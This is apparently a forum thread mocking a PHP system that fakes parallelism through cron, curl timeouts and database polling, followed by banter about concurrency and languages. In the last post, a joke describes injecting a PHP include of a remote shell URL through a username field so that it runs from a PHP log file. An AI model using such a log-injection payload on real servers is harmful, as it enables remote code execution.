Parallel computing with Cron and PHP
-
I'm not sure I ever told you about how a certain system, lets call it AIRHEAD, does it's calculations. Count the WTF.
- Customer sends sample data to a DB server on an hourly basis (not a WTF except that they occasionally delay or drop samples)
- At a set time, carefully timed to just after the customer is expected to have sent their samples, a crontab entry on the
airhead.io
system runswget [...] https://airhead.io/process/all.php
to trigger processing. all.php
runs in a loop doing essentially this (pseudocode, I spare you the PHP):for category in sample_categories do curl("https://airhead.io/process/process.php?category=" + category)
process.php
do calculations and write the result to files.all.php
runs calculation to combine the files into a summary file.
Now that would all be quite unreasonable to begin with, but step three is vastly more fragile and complicated for reasons I'm now getting to:
curl_exec()
is per default synchronous so the processing was done in series which is too slow andall.php
times out- A genius realized that you can set a short timeout
CURLOPT_TIMEOUT
which means the CURL call will return before the HTTP call completes. Effectively parallelizing the process. This works because the webserver is configured not to abort PHP when a request is canceled. - Now because
all.php
does not wait for a response code, it doesn't know whether the jobs completed. So the jobs write their status to a DB all.php
then waits in a sleepy loop for all jobs to clear, polling the DB- Then
all.php
schedules the summing step - Because sometimes samples are delayed, the cronjob is duplicated 5 minutes later so it re-runs
all.php
. which must check with the DB whether the jobs need running. - Monitoring of this machinery is implemented by having the jobs log profusely to a logfile. If the log goes over a threshold size we get alerted. The logfile is rotated every day so the alert is cleared every day because the failures are rotated away.
Now you'd think people should realize their path to hell when things are not going well. But no, they double down. You see, sometimes the
airhead.io
webserver (where all this runs) would delay answering a request, which means CURL aborts the connection before the job starts. How can we detect this situation? Genius knows how: set the connection timeout slightly lower than the total curl timeout, then detect connection failures by the fact that CURL was not waiting for a transfer! So that's how this pull request was sent my way. Again, details omitted, the real code is ten times as long due to various hacks I'll ignore here. This is how a job is started:... curl_setopt($curl, CURLOPT_CONNECTTIMEOUT_MS, 95); curl_setopt($curl, CURLOPT_TIMEOUT_MS, 100); curl_exec($curl); $errno = curl_errno($curl); $getInfo = curl_getinfo($curl); if( $errno == CURLE_OPERATION_TIMEDOUT ) { $pretransferTime = $getInfo["pretransfer_time"]; if( $pretransferTime == 0 ) { log('error', 'connection failure'); } else { log('success', 'job started'); } } else { // more error handling ... }
So essentially, an HTTP request is sent and aborted after 100ms by which time it should have started processing. But if CURL was still stuck trying to connect after 95ms it will have aborted without having waited for data (
pretransfer_time === 0
), which allows us to detect connection timeouts where the job was likely not started.Overcoming the onslaught of WTF while piecing together the functionality, I consolidated my swearing to these recommendations:
- Start PHP processes from cron with
/usr/bin/php
rather than going through webserver withwget
- Start PHP backround processes with
shell_exec()
popen()
(yes, it's available) instead of going through the webserver withcurl
- Use
curl_multi_*()
for async processing if option 2. is too big a change.
The answer: "Oh that would be too much work and it works as it is. Also you can't do things in parallel in a PHP process so option 3 can't work."
The guy then spent more than a day tweaking the timeouts to bring the flakiness of the system below an "acceptable" threshold. And we're still living with that broken parallelization scheme a year later. I was just too much of a softie in code-reviews But experiences like this one steel my resolve
-
@gleemonk
shell_exec()
is synchronous. There are several asynchronous alternatives; I think I ended up usingpopen()
.
-
I thought
airhead.io
was real.
-
It could be. That wouldn't be the most ridiculous thing we've seen, by far.
-
@_P_ said in Parallel computing with Cron and PHP:
I thought
airhead.io
was real.It kinda is. And just from their frontpage, I'm nearly certain they belong in this category.
-
See?
-
@gleemonk ... you know a wtf is going to be damn good when just reading the title makes you actually laugh out loud
-
Just seeing
all.php
makes my blood curdle.
-
-
@gleemonk said in Parallel computing with Cron and PHP:
A genius
That must be one of those 10x engineers we heard about yesterday.
-
@PleegWat said in Parallel computing with Cron and PHP:
popen()
Thanks! I wasn't sure what I recommended a year ago so I took the first thing that could possibly work. While it does "work",
shell_exec()
would be really ugly because you'd have to background the process with&
.
-
@gleemonk said in Parallel computing with Cron and PHP:
- Use
curl_multi_*()
for async processing if if option 2. is too big a change.
The answer: "Oh that would be too much work and it works as it is. Also you can't do things in parallel in a PHP process so option 3 can't work."
I've seen way too much code and spoken to way too many engineers that doesn't/who don't understand
select()
-like APIs. It's like I/O multiplexing is completely incomprehensible to them, because how can you have a single thread of code monitoring multiple things at the same time? Surely you'd need a separate thread for each thing, right?My current employer's code takes this to the extreme by spawning a new thread every mouse click or similarly basic UI operation, because reasons. Of course, changing it "would be too much work and it works as it is".
- Use
-
@strangeways said in Parallel computing with Cron and PHP:
spawning a new thread every mouse click or similarly basic UI operation
Which means mouse-clicks can be applied out-of-order
-
@gleemonk
There are only two hard things in programming:- Naming things
...I’ll come in again - Race conditions
- Off-by-one errors
- Naming things
-
@izzion Yes indeed cache-invalidation is the worst problem.
-
@izzion said in Parallel computing with Cron and PHP:
@gleemonk
There are only two hard things in programming:- Naming things
...I’ll come in again - Race conditions
- Off-by-one errors
And scope creep.
- Naming things
-
@dkf scope creep isn't a hard problem. It's unsolvable solely for political reasons.
-
The Mythical Man Month had some insight as to why my pet projects always balloon out control on scope.
It says that the scope is defined by budgetary constraints of time and money. Since I never had a budget for my projects, their scope grew unboundedly.
-
That's the problem with uninitialized variables.
-
@Zerosquare said in Parallel computing with Cron and PHP:
That's the problem with uninitialized variables.
It could be worse.
-
@gleemonk said in Parallel computing with Cron and PHP:
all.php
runs in a loop doing essentially this (pseudocode, I spare you the PHP):for category in sample_categories do curl("https://airhead.io/process/process.php?category=" + category)
fork()
As A Service!
-
@error said in Parallel computing with Cron and PHP:
It could be worse.
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
-
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever hunt you in your worst dreams.
-
Shhhhh. I already worry at night about the possibility that my work could be the cause of a major issue. I don't need more anxiety, thank you.
-
@dfdub said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever hunt you in your worst dreams.
Like the LHC? Not that I have any knowledge yea or nay, but that’s a possibility :shudders:
-
@M_Adams said in Parallel computing with Cron and PHP:
@dfdub said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
If you're really honest, you know that someone is probably using it for that purpose, and that thought will forever hunt you in your worst dreams.
Like the LHC? Not that I have any knowledge yea or nay, but that’s a possibility :shudders:
Worse, they're probably using C++.
-
@_P_: duh. To accelerate particles, you need a fast langage!
-
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast langage!
Last time I checked C++ does not take account the effect of relativity. Or quantum mechanics.
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast langage!
Last time I checked C++ does not take account the effect of relativity. Or quantum mechanics.
Clearly you need a 4 dimensional operating system for that.
-
@_P_ said in Parallel computing with Cron and PHP:
Last time I checked C++ does not take account the effect of relativity. Or quantum mechanics.
Are you sure? I wouldn't be surprised if it was a documented cause of undefined behavior.
-
@Zerosquare Radiation-induced bit-flips can indeed cause undefined behaviour. Most people don't have to care about this.
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast langage!
Last time I checked C++ does not take account the effect of relativity. Or quantum mechanics.
But it does allow time travel!
-
@Zerosquare said in Parallel computing with Cron and PHP:
I already worry at night about the possibility that my work could be the cause of a major issue.
I hear ya... Working in an FDA regulated industry is … different.
-
@_P_ why, of course it does (at least for relativity): https://root.cern/doc/master/classROOT_1_1Math_1_1LorentzVector.html
-
@dcon said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
I already worry at night about the possibility that my work could be the cause of a major issue.
I hear ya... Working in an FDA regulated industry is … different.
IME it is only different by all the s being harder to fix, because the product is already through formal testing.
Granted, the mere existence of formal testing does make it somewhat better than some other industries, but not by much. The formal tests are black-box, so sufficiently rare race conditions and similar intermittent issues fly right through:
- If the tests are automated, their timing is fairly predictable. And in the cases I've seen fairly slow, because spawning
adb input
takes some time and moving the mechanical finger to the right spot above the iPad even more so. - If the tests are manual, occasional failure is written down to the tester clicking wrong.
- Even automated tests are retried when they fail, and the failure written down as problem of the test rig, if they manage to succeed eventually, because the test rigs and libraries are flaky.
- If the tests are automated, their timing is fairly predictable. And in the cases I've seen fairly slow, because spawning
-
@Zerosquare said in Parallel computing with Cron and PHP:
@error said in Parallel computing with Cron and PHP:
It could be worse.
I sincerely hope nobody uses PHP to manage something that generates high-energy radiation.
disable_deadly_radiation_real2()
-
@dargor17 Welcome back!
-
Wow this codebase provides! I'm doing some more work on it and as part of that I checked the log-file
log-2019-08-16.php
. Here's the first line in this file:<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?>
Yes it's true the logfile has a
.php
extension.
-
What really worries me about this is the
OR
. It looks like the original programmer thought there were legitimate reasons why one would want to run a logfile through the PHP parser
-
@_P_ said in Parallel computing with Cron and PHP:
@Zerosquare said in Parallel computing with Cron and PHP:
@_P_: duh. To accelerate particles, you need a fast langage!
Last time I checked C++ does not take account the effect of relativity. Or quantum mechanics.
So what you're saying is, they're using Q#?
-
@gleemonk said in Parallel computing with Cron and PHP:
What really worries me about this is the
OR
. It looks like the original programmer thought there were legitimate reasons why one would want to run a logfile through the PHP parserOf course there is. Including it in that
admyn.php
page cleverly secured by the unguessable name and there being no public links to it (at least I hope so).
-
@Bulb said in Parallel computing with Cron and PHP:
Of course there is. Including it in that
admyn.php
page cleverly secured by the unguessable name and there being no public links to it (at least I hope so).Hey how did you know our production setup? Well I'm not worried because you don't know our domain so it's all perfectly secure Anyway that script also enables a clever way of logging in when you misplaced the note with the password: Because user input is logged to the logfile you can fill out the form with this username
Bobby <?php include("http://shells.for.everyone/php"); ?>
and then visitadmyn.php
to trigger the shellSeriously though, I haven't found a place where logfiles are PHP-included. Maybe that part was removed.